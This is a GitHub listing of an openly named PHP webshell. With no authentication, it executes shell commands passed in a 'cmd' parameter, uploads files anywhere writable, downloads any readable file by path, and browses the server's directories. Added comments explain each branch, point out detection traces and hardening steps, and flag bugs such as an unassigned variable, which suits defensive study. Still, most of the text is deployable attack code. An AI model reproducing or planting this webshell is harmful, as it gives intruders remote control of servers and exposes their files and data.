19drag0s /
20php-webshell
35php-webshell/webshell.php /
36@drag0s
37drag0s ADD feature: upload files
38Latest commit 474c3bc Sep 21, 2016
42<?php
43
// File-download handler. The `download` query parameter is used as a filesystem
// path exactly as received: the only check is file_exists(), and no
// authentication, base-directory restriction or allow-list is visible in this
// listing. Any file readable by the account running PHP is therefore streamed
// back to the requester as an attachment.
// Defender's view: access-log entries carrying `download=` with an absolute or
// traversal-style path, answered with Content-Type application/octet-stream,
// are the trace this branch leaves behind.
44if (isset($_GET['download'])) {
45 $file = $_GET['download'];
46 if (file_exists($file)) {
// Headers that force a "save as" download named after the file's basename.
47 header('Content-Description: File Transfer');
48 header('Content-Type: application/octet-stream');
49 header('Content-Disposition: attachment; filename="'.basename($file).'"');
50 header('Expires: 0');
51 header('Cache-Control: must-revalidate');
52 header('Pragma: public');
53 header('Content-Length: ' . filesize($file));
// Stream the raw file contents, then stop so none of the HTML below is appended.
54 readfile($file);
55 exit;
56 }
57}
58
59?>
60
61<html>
62<!-- Latest compiled and minified CSS -->
63<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
64
65<!-- jQuery library -->
66<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
67
68<!-- Latest compiled JavaScript -->
69<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
70
71<div class="container">
72
73
74<?php
75
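/**
 * Render a path's mode bits as an `ls -l`-style string, e.g. "drwxr-xr-x".
 *
 * @param string $file Path passed to fileperms().
 * @return string One file-type character followed by the owner, group and
 *                world rwx triplets; "u---------" when the mode cannot be read.
 */
function printPerms($file) {
    $mode = fileperms($file);
    if ($mode === false) {
        // fileperms() failed: report every field as unknown/unset instead of
        // doing bit arithmetic on a boolean.
        return 'u---------';
    }

    // The file type is a 4-bit field, not a set of independent flags, so it is
    // masked with 0xF000 and compared for equality. Testing single bits (as an
    // if/else chain of `$mode & 0x....`) reports sockets as directories and
    // symlinks and block devices as character devices.
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }

    // One row per permission class: read, write, execute, the special bit for
    // that class, and the letter shown when the special bit is set with or
    // without the execute bit.
    $classes = array(
        array(0400, 0200, 0100, 04000, 's', 'S'), // owner / setuid
        array(0040, 0020, 0010, 02000, 's', 'S'), // group / setgid
        array(0004, 0002, 0001, 01000, 't', 'T'), // world / sticky
    );

    $s = $type;
    foreach ($classes as $class) {
        list($read, $write, $exec, $special, $withExec, $withoutExec) = $class;
        $s .= ($mode & $read) ? 'r' : '-';
        $s .= ($mode & $write) ? 'w' : '-';
        if ($mode & $special) {
            $s .= ($mode & $exec) ? $withExec : $withoutExec;
        } else {
            $s .= ($mode & $exec) ? 'x' : '-';
        }
    }
    return $s;
}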
104
105
// Working directory is taken straight from the request: the GET `dir` value,
// overridden by a POST `dir` value when one is present. No authentication or
// path restriction is visible anywhere in this listing.
106$dir = $_GET['dir'];
107if (isset($_POST['dir'])) {
108 $dir = $_POST['dir'];
109}
110$file = '';
// A missing or non-directory value falls back to the script's own directory;
// when the value names a regular file it is echoed (debug output) first.
111if ($dir == NULL or !is_dir($dir)) {
112 if (is_file($dir)) {
113 echo "enters";
114 $file = $dir;
115 echo $file;
116 }
117 $dir = './';
118}
// Canonicalise the path. NOTE(review): $value is not assigned before this line
// in the visible code.
119$dir = realpath($dir.'/'.$value);
120
121$dirs = scandir($dir);
// The request-derived values ($dir, $_GET['dir'], PHP_SELF) are written into
// the page below without HTML escaping.
122echo "<h2>Viewing directory " . $dir . "</h2>";
// Form 1: text box whose contents come back as the GET `cmd` parameter.
123echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>";
124echo "<input type='hidden' name='dir' value=".$dir." />";
125echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
126echo "</form>";
// Form 2: multipart upload posted back to this same script.
127echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
128echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";
129echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
130echo "</div>";
131
// Upload handler. The destination is $dir plus the basename of the
// client-supplied filename; there is no extension, content-type or size check,
// and the only refusal is when the target already exists. Any location the PHP
// account can write to, including directories served as executable script, is
// a valid destination.
// Defender's view: keep writable directories non-executable in the web-server
// configuration and alert on new script files appearing under the web root
// (file-integrity monitoring).
132if (isset($_POST['submit'])) {
133 $uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']);
134 if (file_exists($uploadDirectory)) {
135 echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
136 }
137 else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
138 echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
139 } else {
140 echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';
141
142 }
143
144}
145
// Command execution. The GET `cmd` parameter is concatenated into a shell
// command line after `cd $dir &&` and handed to exec() unmodified; each output
// line is echoed back into the page. This runs with the privileges of the
// account executing PHP.
// Defender's view: the web-server or PHP worker process spawning a shell is
// visible in process-creation telemetry, and `cmd=` query strings show up in
// access logs because the form uses GET. Where the hosted application does not
// need them, listing exec-family functions in php.ini's disable_functions
// removes this primitive.
146if (isset($_GET['cmd'])) {
147 echo "<br><br><b>Result of command execution: </b><br>";
148 exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult);
149 foreach ($cmdresult as $key => $value) {
150 echo "$value \n<br>";
151 }
152}
153echo "<br>";
154?>
155
156<table class="table table-hover table-bordered">
157 <thead>
158 <tr>
159 <th>Name</th>
160 <th>Owner</th>
161 <th>Permissions</th>
162 </tr>
163 </thead>
164 <tbody>
165<?php
// Directory browser. Every entry returned by scandir() becomes a table row that
// links back to this script: directories through `?dir=<realpath>/`, everything
// else through `?download=<realpath>`, i.e. into the file-download handler at
// the top of the file. The owner column resolves the file's uid to an account
// name via posix_getpwuid().
// NOTE(review): printPerms() is called with $dir rather than the entry's own
// path, so each row shows the listed directory's permission string. Entry names
// and paths are echoed without HTML or URL escaping.
166foreach ($dirs as $key => $value) {
167 echo "<tr>";
168 if (is_dir(realpath($dir.'/'.$value))) {
169 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
170 }
171 else {
172 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n";
173 }
174 echo "</tr>";
175}
// Close the table that the static HTML above opened.
176echo "</tbody>";
177echo "</table>";
178
179
180?>
181
182
183
184</div>
185</html>
186